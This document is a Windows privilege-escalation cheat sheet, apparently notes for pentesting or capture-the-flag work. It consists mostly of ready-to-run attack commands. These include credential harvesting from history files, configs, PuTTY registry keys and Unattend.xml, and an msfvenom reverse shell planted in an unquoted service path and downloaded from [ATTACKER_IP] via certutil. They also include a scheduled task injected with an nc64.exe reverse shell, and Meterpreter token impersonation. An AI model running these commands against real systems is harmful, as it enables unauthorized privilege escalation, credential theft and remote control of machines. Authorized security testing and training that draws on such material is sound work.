Privesc Checklist
powershell -c "Get-Service"Return services.
Get-ScheduledTaskReturn Scheduled tasks.
cmdkey /listList saved credentials (can’t see password).runas /savecred /user:admin powershell.exeRun a program with saved creds.
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txtShow CMD history.
type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txtShow Powershell History.
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionStringSearch for database password in IIS config.
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /sLook for Putty credentials in registers (SimonTatham is PuTTY’s creator).
Automated Scripts
POWERUP
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
. .\PowerUp.ps1Invoke-AllChecks
EXPLOIT-SUGGESTER
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
On target
systeminfo
On attacker machine
pip install xlrd==1.2.0
windows-exploit-suggester.py --updatewindows-exploit-suggester.py --systeminfo systeminfo.txt --database [DATE]-mssb.xls
WINPEAS
https://github.com/carlospolop/PEASS-ng/releases
winPEASx64.exe Run WinPEAD
WINPEAS Output
WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected YOU CAN MODIFY THIS SERVICE: AllAccess
On attacker machine
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o Wise.exeCreate a reverse shell with the name of the modifiable service.
nc -lvnp [ATTACKER_PORT]Open a listener.
On target machine
cd "C:\Program Files (x86)\Wise"certutil.exe -urlcache -f http://[ATTACKER_IP]:[ATTACKER_PORT]/Wise.exe Wise.exeDownload crafted executable and place it where the space is in the vulnerable path.
sc.exe stop WiseBootAssistantsc.exe query WiseBootAssistantsc.exe start WiseBootAssistantRestart the service to execute the crafted one.
PRIVESCHECK
https://github.com/itm4n/PrivescCheck
Set-ExecutionPolicy Bypass -Scope process -Force. .\PrivescCheck.ps1Invoke-PrivescCheck
ROADRECON (Azure AD)
https://github.com/dirkjanm/ROADtools/wiki/Getting-started-with-ROADrecon
Abusing Schtasks
Show Schtasks
schtasks /query /tn vulnerableTask /fo list /vShow detail info about the scheduled task.
cd c:\Program Files (x86)\SystemScheduler\Eventstype [ID].INI_LOG.txt Show tasks logs.
Replace executable
mv excutedByTask.exe excutedByTask.exe.bakmv msfvenomeReverseShell excutedByTask.exe Replace exe that being executed by scheduled tasks.
Inject scheduled task
echo c:\tools\nc64.exe -e cmd.exe [ATTACKER_IP] [ATTACKER_PORT] > C:\tasks\schtask.batInject scheduled task with reverse shell.
Abusing Privileges
Here are the most commonly abused privileges:
- SeImpersonatePrivilege
- SeAssignPrimaryPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
whoami /privShow current user privileges.
SeDebugPrivilege and SeImpersonatePrivilege
When SeDebugPrivilege and SeImpersonatePrivilege are enabled, we can impersonate another user.
load incognitolist_tokens -gList tokens.
impersonate_token "BUILTIN\Administrators"Impersonate token.
To determine rights, Windows uses the Primary Token of the process and not the impersonated token. So we have to migrate to a process with correct permissions.
The safest to pick is services.exe.
migrate 668Migrate to process 668.
Unattended Path
Unattended Setup is the method by which OEMs (Original Equipment Manufacturers) install Windows NT in unattended mode. C:\Windows\Panther\Unattend\Unattended.xml is where users' passwords are stored in base64.
type C:\Windows\Panther\Unattend\Unattended.xmlDisplay unattended password.
<AutoLogon>
<Password>
<Value>dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=</Value>
<PlainText>false</PlainText>
</Password>
<Enabled>true</Enabled>
<Username>Administrator</Username>
</AutoLogon>